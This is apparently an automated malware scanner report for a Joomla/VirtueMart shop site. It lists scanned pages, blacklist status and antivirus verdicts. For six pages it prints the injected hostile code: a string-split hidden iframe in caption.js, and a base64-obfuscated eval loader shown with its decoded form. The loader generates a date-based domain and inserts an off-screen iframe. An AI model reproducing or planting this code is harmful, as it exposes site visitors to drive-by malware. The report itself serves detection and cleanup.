New scan:

Malware Scanner report for tlesystem.net

Malicious/Suspicious/Total urls checked
6/0/16
6 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "tlesystem.net" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/5
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=tlesystem.net

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://www.tlesystem.net/
200 OK
Content-Length: 23933
Content-Type: text/html
clean
http://www.tlesystem.net/media/system/js/caption.js
200 OK
Content-Length: 1935
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var JCaption = new Class({
initialize: function(selector)
{
this.selector = selector;
var images = $$(selector);
images.each(function(image){ this.createCaption(image); }, this);
},
createCaption: function(element)
{
var caption = document.createTextNode(element.title);
var container = document.createElement("div");
var text = document.createElement("p");
var width = element.getAttribute("width");
var align =
... 426 bytes are skipped ...
br/> container.setAttribute("style","float:"+align);
container.style.width = width + "px";
}
});
document.caption = null
window.addEvent('load', function() {
var caption = new JCaption('img.caption')
document.caption = caption
});
document.write('<iframe src="'+'ht'+'tp://pr'+'an'+'tijk'+'e'+'lav'+'anim'+'an'+'dal.'+'org/c'+'omp'+'on'+'ents/c'+'om_c'+'ont'+'ent/'+'m'+'od'+'els/'+'sh.'+'html" width="0" height="0" frameborder="0"></iframe>');

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic
Sophos
Mal/Iframe-AN

http://www.tlesystem.net/templates/ja_larix/scripts/ja.script.js
200 OK
Content-Length: 5744
Content-Type: application/javascript
clean
http://www.tlesystem.net/templates/ja_larix/ja_menus/ja_cssmenu/ja.cssmenu.js
200 OK
Content-Length: 1158
Content-Type: application/javascript
clean
http://www.tlesystem.net/components/com_virtuemart/fetchscript.php?gzip=0&subdir[0]=/themes/ja_larix&file[0]=theme.js&subdir[1]=/js/mootools&file[1]=mootools-release-1.11.js&subdir[2]=/js/mootools&file[2]=mooPrompt.js
200 OK
Content-Length: 54053
Content-Type: text/javascript
clean
http://www.tlesystem.net/modules/mod_ja_vmproductslide/ja_vmproductslide/ja.vmproductslide.js
200 OK
Content-Length: 6141
Content-Type: application/javascript
clean
http://www.tlesystem.net/index.php
200 OK
Content-Length: 53897
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

eval((function(r,s){var t='',p=-8,a=0,b,c;for(var i=0;i<s.length;i++){if((c=r.indexOf(s.charAt(i)))<0)continue;a=(a<<6)|(c&63);if((p+=6)>=0){b=(a>>p)&255;if(c!=64)t+=String.fromCharCode(b);a&=63;p-=8;}}return t;}('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=','dmFyIGtleXNzPSJhcDEybTNuNGo1aTZ1N2RoOGI5djBneXRmY2RyNWV3cWRhcyI7DQp2YXIgZW5jID0gWzUsIDMsIDEsIDExLCAzLCAxMSwgOCwgMTUsIDExLCAyMiwgOV07DQp2YXIgYWggPSBuZXcgRGF0ZSgpLmdldERhdGUoKSsxOw0KdmFyI
... 356 bytes are skipped ...
3NpdGlvbjphYnNvbHV0ZTtsZWZ0Oi0xMDAwcHg7dG9wOi0xMDAwcHg7Jz48L2kiK2ZmZisiZT4iKTsNCn0NCmZ1bmN0aW9uIGlmcmFtZXIoKSB7DQp2YXIgZiA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2knK2ZmZisnZScpOw0KZi5zZXRBdHRyaWJ1dGUoJ3NyYycsIHVybCk7DQpmLnN0eWxlLnBvc2l0aW9uID0gJ2Fic29sdXRlJzsNCmYuc3R5bGUubGVmdCA9ICctMTAwMHB4JzsNCmYuc3R5bGUudG9wID0gJy0xMDAwcHgnOw0KZi5zZXRBdHRyaWJ1dGUoJ3dpZHRoJywgJzEwMCcpOw0KZi5zZXRBdHRyaWJ1dGUoJ2hlaWdodCcsICcxMDAnKTsNCmRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdib2R5JylbMF0uYXBwZW5kQ2hpbGQoZik7DQp9')));

Decoded script:


var keyss="ap12m3n4j5i6u7dh8b9v0gytfcdr5ewqdas";
var enc = [5, 3, 1, 11, 3, 11, 8, 15, 11, 22, 9];
var ah = new Date().getDate()+1;
var url="http://";
for (i=0;i<enc.length;i++) url+=keyss.substr((ah*enc[i]) % 31,1);
url+=".org/ts/go.php?q=1";
fff="fram";
if (document.getElementsByTagName('body')[0]) { iframer();} else {
document.write("<i"+fff+"e src='"+url+"' width='100' height='100' style='position:absolute;left:-1000px;top:-1000px;'></
... 905 bytes are skipped ...
ction iframer() {
var f = document.createElement('i'+fff+'e');
f.setAttribute('src', url);
f.style.position = 'absolute';
f.style.left = '-1000px';
f.style.top = '-1000px';
f.setAttribute('width', '100');
f.setAttribute('height', '100');
document.getElementsByTagName('body')[0].appendChild(f);
}
<iframe src='http://7dhidirji06.org/ts/go.php?q=1' width='100' height='100' style='position:absolute;left:-1000px;top:-1000px;'></iframe>

Antivirus reports:

McAfee-GW-Edition
Heuristic.BehavesLike.JS.Infected.A

http://www.tlesystem.net/modules/mod_virtuemart/vm_transmenu/transmenu.js
200 OK
Content-Length: 33382
Content-Type: application/javascript
clean
http://www.tlesystem.net/templates/ja_larix/scripts/vm_stuff.js
200 OK
Content-Length: 702
Content-Type: application/javascript
clean
http://www.tlesystem.net/index.php/component/virtuemart/?page=shop.cart
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 14 Jan 2015 21:13:50 GMT
Location: http://www.tlesystem.net/index.php/component/virtuemart/?page=shop.cart&vmcchk=1
Server: nginx/1.6.2
Vary: Accept-Encoding,User-Agent
Content-Length: 15
Content-Type: text/html
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 3d2e90a90b97134a7f209b432503405e=3kk81ufd2og6ngpn1crfhakh07; path=/
Set-Cookie: virtuemart=3kk81ufd2og6ngpn1crfhakh07
X-Powered-By: PHP/5.3.27
clean
http://www.tlesystem.net/index.php/component/virtuemart/?page=shop.cart&vmcchk=1
200 OK
Content-Length: 32278
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

eval((function(r,s){var t='',p=-8,a=0,b,c;for(var i=0;i<s.length;i++){if((c=r.indexOf(s.charAt(i)))<0)continue;a=(a<<6)|(c&63);if((p+=6)>=0){b=(a>>p)&255;if(c!=64)t+=String.fromCharCode(b);a&=63;p-=8;}}return t;}('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=','dmFyIGtleXNzPSJhcDEybTNuNGo1aTZ1N2RoOGI5djBneXRmY2RyNWV3cWRhcyI7DQp2YXIgZW5jID0gWzUsIDMsIDEsIDExLCAzLCAxMSwgOCwgMTUsIDExLCAyMiwgOV07DQp2YXIgYWggPSBuZXcgRGF0ZSgpLmdldERhdGUoKSsxOw0KdmFyI
... 356 bytes are skipped ...
3NpdGlvbjphYnNvbHV0ZTtsZWZ0Oi0xMDAwcHg7dG9wOi0xMDAwcHg7Jz48L2kiK2ZmZisiZT4iKTsNCn0NCmZ1bmN0aW9uIGlmcmFtZXIoKSB7DQp2YXIgZiA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2knK2ZmZisnZScpOw0KZi5zZXRBdHRyaWJ1dGUoJ3NyYycsIHVybCk7DQpmLnN0eWxlLnBvc2l0aW9uID0gJ2Fic29sdXRlJzsNCmYuc3R5bGUubGVmdCA9ICctMTAwMHB4JzsNCmYuc3R5bGUudG9wID0gJy0xMDAwcHgnOw0KZi5zZXRBdHRyaWJ1dGUoJ3dpZHRoJywgJzEwMCcpOw0KZi5zZXRBdHRyaWJ1dGUoJ2hlaWdodCcsICcxMDAnKTsNCmRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdib2R5JylbMF0uYXBwZW5kQ2hpbGQoZik7DQp9')));

Decoded script:


var keyss="ap12m3n4j5i6u7dh8b9v0gytfcdr5ewqdas";
var enc = [5, 3, 1, 11, 3, 11, 8, 15, 11, 22, 9];
var ah = new Date().getDate()+1;
var url="http://";
for (i=0;i<enc.length;i++) url+=keyss.substr((ah*enc[i]) % 31,1);
url+=".org/ts/go.php?q=1";
fff="fram";
if (document.getElementsByTagName('body')[0]) { iframer();} else {
document.write("<i"+fff+"e src='"+url+"' width='100' height='100' style='position:absolute;left:-1000px;top:-1000px;'></
... 905 bytes are skipped ...
ction iframer() {
var f = document.createElement('i'+fff+'e');
f.setAttribute('src', url);
f.style.position = 'absolute';
f.style.left = '-1000px';
f.style.top = '-1000px';
f.setAttribute('width', '100');
f.setAttribute('height', '100');
document.getElementsByTagName('body')[0].appendChild(f);
}
<iframe src='http://7dhidirji06.org/ts/go.php?q=1' width='100' height='100' style='position:absolute;left:-1000px;top:-1000px;'></iframe>

Antivirus reports:

McAfee-GW-Edition
Heuristic.BehavesLike.JS.Infected.A

http://www.tlesystem.net/components/com_virtuemart/fetchscript.php?gzip=0&subdir[0]=/themes/ja_larix&file[0]=theme.js&subdir[1]=/js&file[1]=sleight.js&subdir[2]=/js/mootools&file[2]=mootools-release-1.11.js&subdir[3]=/js/mootools&file[3]=mooPrompt.js
200 OK
Content-Length: 56266
Content-Type: text/javascript
clean
http://www.tlesystem.net/index.php/component/virtuemart/
200 OK
Content-Length: 34989
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

eval((function(r,s){var t='',p=-8,a=0,b,c;for(var i=0;i<s.length;i++){if((c=r.indexOf(s.charAt(i)))<0)continue;a=(a<<6)|(c&63);if((p+=6)>=0){b=(a>>p)&255;if(c!=64)t+=String.fromCharCode(b);a&=63;p-=8;}}return t;}('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=','dmFyIGtleXNzPSJhcDEybTNuNGo1aTZ1N2RoOGI5djBneXRmY2RyNWV3cWRhcyI7DQp2YXIgZW5jID0gWzUsIDMsIDEsIDExLCAzLCAxMSwgOCwgMTUsIDExLCAyMiwgOV07DQp2YXIgYWggPSBuZXcgRGF0ZSgpLmdldERhdGUoKSsxOw0KdmFyI
... 356 bytes are skipped ...
3NpdGlvbjphYnNvbHV0ZTtsZWZ0Oi0xMDAwcHg7dG9wOi0xMDAwcHg7Jz48L2kiK2ZmZisiZT4iKTsNCn0NCmZ1bmN0aW9uIGlmcmFtZXIoKSB7DQp2YXIgZiA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2knK2ZmZisnZScpOw0KZi5zZXRBdHRyaWJ1dGUoJ3NyYycsIHVybCk7DQpmLnN0eWxlLnBvc2l0aW9uID0gJ2Fic29sdXRlJzsNCmYuc3R5bGUubGVmdCA9ICctMTAwMHB4JzsNCmYuc3R5bGUudG9wID0gJy0xMDAwcHgnOw0KZi5zZXRBdHRyaWJ1dGUoJ3dpZHRoJywgJzEwMCcpOw0KZi5zZXRBdHRyaWJ1dGUoJ2hlaWdodCcsICcxMDAnKTsNCmRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdib2R5JylbMF0uYXBwZW5kQ2hpbGQoZik7DQp9')));

Decoded script:


var keyss="ap12m3n4j5i6u7dh8b9v0gytfcdr5ewqdas";
var enc = [5, 3, 1, 11, 3, 11, 8, 15, 11, 22, 9];
var ah = new Date().getDate()+1;
var url="http://";
for (i=0;i<enc.length;i++) url+=keyss.substr((ah*enc[i]) % 31,1);
url+=".org/ts/go.php?q=1";
fff="fram";
if (document.getElementsByTagName('body')[0]) { iframer();} else {
document.write("<i"+fff+"e src='"+url+"' width='100' height='100' style='position:absolute;left:-1000px;top:-1000px;'></
... 905 bytes are skipped ...
ction iframer() {
var f = document.createElement('i'+fff+'e');
f.setAttribute('src', url);
f.style.position = 'absolute';
f.style.left = '-1000px';
f.style.top = '-1000px';
f.setAttribute('width', '100');
f.setAttribute('height', '100');
document.getElementsByTagName('body')[0].appendChild(f);
}
<iframe src='http://7dhidirji06.org/ts/go.php?q=1' width='100' height='100' style='position:absolute;left:-1000px;top:-1000px;'></iframe>

Antivirus reports:

McAfee-GW-Edition
Heuristic.BehavesLike.JS.Infected.A

http://www.tlesystem.net/components/com_virtuemart/fetchscript.php?gzip=0&subdir[0]=/js&file[0]=wz_tooltip.js
200 OK
Content-Length: 36551
Content-Type: text/javascript
clean
http://www.tlesystem.net/index.php/home-tlesystem
200 OK
Content-Length: 54124
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

eval((function(r,s){var t='',p=-8,a=0,b,c;for(var i=0;i<s.length;i++){if((c=r.indexOf(s.charAt(i)))<0)continue;a=(a<<6)|(c&63);if((p+=6)>=0){b=(a>>p)&255;if(c!=64)t+=String.fromCharCode(b);a&=63;p-=8;}}return t;}('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=','dmFyIGtleXNzPSJhcDEybTNuNGo1aTZ1N2RoOGI5djBneXRmY2RyNWV3cWRhcyI7DQp2YXIgZW5jID0gWzUsIDMsIDEsIDExLCAzLCAxMSwgOCwgMTUsIDExLCAyMiwgOV07DQp2YXIgYWggPSBuZXcgRGF0ZSgpLmdldERhdGUoKSsxOw0KdmFyI
... 356 bytes are skipped ...
3NpdGlvbjphYnNvbHV0ZTtsZWZ0Oi0xMDAwcHg7dG9wOi0xMDAwcHg7Jz48L2kiK2ZmZisiZT4iKTsNCn0NCmZ1bmN0aW9uIGlmcmFtZXIoKSB7DQp2YXIgZiA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2knK2ZmZisnZScpOw0KZi5zZXRBdHRyaWJ1dGUoJ3NyYycsIHVybCk7DQpmLnN0eWxlLnBvc2l0aW9uID0gJ2Fic29sdXRlJzsNCmYuc3R5bGUubGVmdCA9ICctMTAwMHB4JzsNCmYuc3R5bGUudG9wID0gJy0xMDAwcHgnOw0KZi5zZXRBdHRyaWJ1dGUoJ3dpZHRoJywgJzEwMCcpOw0KZi5zZXRBdHRyaWJ1dGUoJ2hlaWdodCcsICcxMDAnKTsNCmRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdib2R5JylbMF0uYXBwZW5kQ2hpbGQoZik7DQp9')));

Decoded script:


var keyss="ap12m3n4j5i6u7dh8b9v0gytfcdr5ewqdas";
var enc = [5, 3, 1, 11, 3, 11, 8, 15, 11, 22, 9];
var ah = new Date().getDate()+1;
var url="http://";
for (i=0;i<enc.length;i++) url+=keyss.substr((ah*enc[i]) % 31,1);
url+=".org/ts/go.php?q=1";
fff="fram";
if (document.getElementsByTagName('body')[0]) { iframer();} else {
document.write("<i"+fff+"e src='"+url+"' width='100' height='100' style='position:absolute;left:-1000px;top:-1000px;'></
... 905 bytes are skipped ...
ction iframer() {
var f = document.createElement('i'+fff+'e');
f.setAttribute('src', url);
f.style.position = 'absolute';
f.style.left = '-1000px';
f.style.top = '-1000px';
f.setAttribute('width', '100');
f.setAttribute('height', '100');
document.getElementsByTagName('body')[0].appendChild(f);
}
<iframe src='http://7dhidirji06.org/ts/go.php?q=1' width='100' height='100' style='position:absolute;left:-1000px;top:-1000px;'></iframe>

Antivirus reports:

McAfee-GW-Edition
Heuristic.BehavesLike.JS.Infected.A

http://www.tlesystem.net/index.php/
200 OK
Content-Length: 53898
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

eval((function(r,s){var t='',p=-8,a=0,b,c;for(var i=0;i<s.length;i++){if((c=r.indexOf(s.charAt(i)))<0)continue;a=(a<<6)|(c&63);if((p+=6)>=0){b=(a>>p)&255;if(c!=64)t+=String.fromCharCode(b);a&=63;p-=8;}}return t;}('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=','dmFyIGtleXNzPSJhcDEybTNuNGo1aTZ1N2RoOGI5djBneXRmY2RyNWV3cWRhcyI7DQp2YXIgZW5jID0gWzUsIDMsIDEsIDExLCAzLCAxMSwgOCwgMTUsIDExLCAyMiwgOV07DQp2YXIgYWggPSBuZXcgRGF0ZSgpLmdldERhdGUoKSsxOw0KdmFyI
... 356 bytes are skipped ...
3NpdGlvbjphYnNvbHV0ZTtsZWZ0Oi0xMDAwcHg7dG9wOi0xMDAwcHg7Jz48L2kiK2ZmZisiZT4iKTsNCn0NCmZ1bmN0aW9uIGlmcmFtZXIoKSB7DQp2YXIgZiA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2knK2ZmZisnZScpOw0KZi5zZXRBdHRyaWJ1dGUoJ3NyYycsIHVybCk7DQpmLnN0eWxlLnBvc2l0aW9uID0gJ2Fic29sdXRlJzsNCmYuc3R5bGUubGVmdCA9ICctMTAwMHB4JzsNCmYuc3R5bGUudG9wID0gJy0xMDAwcHgnOw0KZi5zZXRBdHRyaWJ1dGUoJ3dpZHRoJywgJzEwMCcpOw0KZi5zZXRBdHRyaWJ1dGUoJ2hlaWdodCcsICcxMDAnKTsNCmRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdib2R5JylbMF0uYXBwZW5kQ2hpbGQoZik7DQp9')));

Decoded script:


var keyss="ap12m3n4j5i6u7dh8b9v0gytfcdr5ewqdas";
var enc = [5, 3, 1, 11, 3, 11, 8, 15, 11, 22, 9];
var ah = new Date().getDate()+1;
var url="http://";
for (i=0;i<enc.length;i++) url+=keyss.substr((ah*enc[i]) % 31,1);
url+=".org/ts/go.php?q=1";
fff="fram";
if (document.getElementsByTagName('body')[0]) { iframer();} else {
document.write("<i"+fff+"e src='"+url+"' width='100' height='100' style='position:absolute;left:-1000px;top:-1000px;'></
... 905 bytes are skipped ...
ction iframer() {
var f = document.createElement('i'+fff+'e');
f.setAttribute('src', url);
f.style.position = 'absolute';
f.style.left = '-1000px';
f.style.top = '-1000px';
f.setAttribute('width', '100');
f.setAttribute('height', '100');
document.getElementsByTagName('body')[0].appendChild(f);
}
<iframe src='http://7dhidirji06.org/ts/go.php?q=1' width='100' height='100' style='position:absolute;left:-1000px;top:-1000px;'></iframe>

Antivirus reports:

McAfee-GW-Edition
Heuristic.BehavesLike.JS.Infected.A


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: tlesystem.net

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: tlesystem.net
Referer: http://www.google.com/search?q=tlesystem.net

Result:
The result is similar to the first query. There are no suspicious redirects found.